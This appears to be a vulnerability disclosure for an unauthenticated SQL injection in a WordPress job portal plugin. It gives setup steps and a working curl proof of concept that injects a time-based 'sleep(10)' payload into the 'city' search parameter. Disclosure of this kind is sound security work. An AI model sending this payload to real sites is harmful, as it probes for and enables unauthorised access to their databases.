Description The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
Setup (as admin): Create a dummy company and a job (if there are none)
Attack (as unauthenticated):
time curl -X POST --data 'jobtitle=a&city=(select*from(select(sleep(10)))a)&wpjobportallay=jobs&WPJOBPORTAL_form_search=WPJOBPORTAL_SEARCH' https://example.com/wp-job-portal-jobseeker-controlpanel/jobs/
and notice the 10s delay of the response